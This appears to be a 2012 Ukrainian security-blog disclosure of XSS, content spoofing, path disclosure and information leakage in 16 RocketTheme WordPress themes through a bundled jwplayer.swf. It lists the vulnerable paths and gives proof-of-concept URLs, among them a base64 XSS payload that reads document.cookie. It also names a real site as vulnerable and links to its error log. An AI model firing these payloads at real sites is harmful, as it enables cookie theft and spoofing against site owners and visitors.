Численні уразливості в численних темах для WordPress
17:10 25.12.2012У грудні, 15.12.2012, я виявив Cross-Site Scripting, Content Spoofing, Full path disclosure та Information Leakage уразливості в численних темах для WordPress. Про що вже повідомив розробникам цих тем.
Це теми виробництва RocketTheme, розробників Rokbox. Дані уразливості подібні до уразливостей в темі Affinity BuddyPress.
Всього я знайшов 16 вразливих тем: Afterburner, Refraction, Solarsentinel, Mixxmag, Iridium, Infuse, Perihelion, Replicant2, Affinity, Nexus, Sentinel, Mynxx Vestnikp, Mynxx, Moxy, Terrantribune, Meridian.
Шляхи в цих темах наступні:
http://site/wordpress/wp-content/themes/rt_afterburner_wp/js/rokbox/jwplayer/jwplayer.swf
http://site/wordpress/wp-content/themes/rt_refraction_wp/js/rokbox/jwplayer/jwplayer.swf
http://site/wordpress/wp-content/themes/rt_solarsentinel_wp/js/rokbox/jwplayer/jwplayer.swf
http://site/wordpress/wp-content/themes/rt_mixxmag_wp/js/rokbox/jwplayer/jwplayer.swf
http://site/wordpress/wp-content/themes/Mixxmag/js/rokbox/jwplayer/jwplayer.swf
http://site/wordpress/wp-content/themes/rt_iridium_wp/js/rokbox/jwplayer/jwplayer.swf
http://site/wordpress/wp-content/themes/rt_infuse_wp/js/rokbox/jwplayer/jwplayer.swf
http://site/wordpress/wp-content/themes/infuse/js/rokbox/jwplayer/jwplayer.swf
http://site/wordpress/wp-content/themes/rt_perihelion_wp/js/rokbox/jwplayer/jwplayer.swf
http://site/wordpress/wp-content/themes/rt_replicant2_wp/js/rokbox/jwplayer/jwplayer.swf
http://site/wordpress/wp-content/themes/rt_affinity_wp/js/rokbox/jwplayer/jwplayer.swf
http://site/wordpress/wp-content/themes/rt_nexus_wp/js/rokbox/jwplayer/jwplayer.swf
http://site/wordpress/wp-content/themes/rt_sentinel/js/rokbox/jwplayer/jwplayer.swf
http://site/wordpress/wp-content/themes/rt_mynxx_wp_vestnikp/js/rokbox/jwplayer/jwplayer.swf
http://site/wordpress/wp-content/themes/rt_mynxx_wp/js/rokbox/jwplayer/jwplayer.swf
http://site/wordpress/wp-content/themes/rt.mynxx.wp/js/rokbox/jwplayer/jwplayer.swf
http://site/wordpress/wp-content/themes/rt_moxy_wp/js/rokbox/jwplayer/jwplayer.swf
http://site/wordpress/wp-content/themes/rt_terrantribune_wp/js/rokbox/jwplayer/jwplayer.swf
http://site/wordpress/wp-content/themes/rt_meridian_wp/js/rokbox/jwplayer/jwplayer.swf
Content Spoofing (WASC-12):
http://site/wordpress/wp-content/themes/rt_afterburner_wp/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF
http://site/wordpress/wp-content/themes/rt_afterburner_wp/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&image=1.jpg
http://site/wordpress/wp-content/themes/rt_afterburner_wp/js/rokbox/jwplayer/jwplayer.swf?config=1.xml
http://site/wordpress/wp-content/themes/rt_afterburner_wp/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=http://site
XSS (WASC-08):
http://site/wordpress/wp-content/themes/rt_afterburner_wp/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B
Full path disclosure (WASC-13):
У всіх цих темах є FPD в index.php (http://site/wordpress/wp-content/themes/rt_afterburner_wp/ і так само для інших тем), що спрацьовує при налаштуваннях PHP по замовчуванню. Також FPD потенційно є в інших php-файлах цих тем.
Information Leakage (WASC-13):
Є сайти з темою rt_mixxmag_wp, що мають error log з FPD.
http://site/wordpress/wp-content/themes/rt_mixxmag_wp/js/rokbox/error_log
Приклад уразливого сайту з темою Mixxmag.
CS (WASC-12) і XSS (WASC-08):
http://securityuncorked.com/wordpress/wp-content/themes/rt_mixxmag_wp/js/rokbox/jwplayer/jwplayer.swf
Information Leakage (WASC-13):
http://securityuncorked.com/wordpress/wp-content/themes/rt_mixxmag_wp/js/rokbox/error_log
Уразливі всі версії всіх вищенаведених тем для WordPress.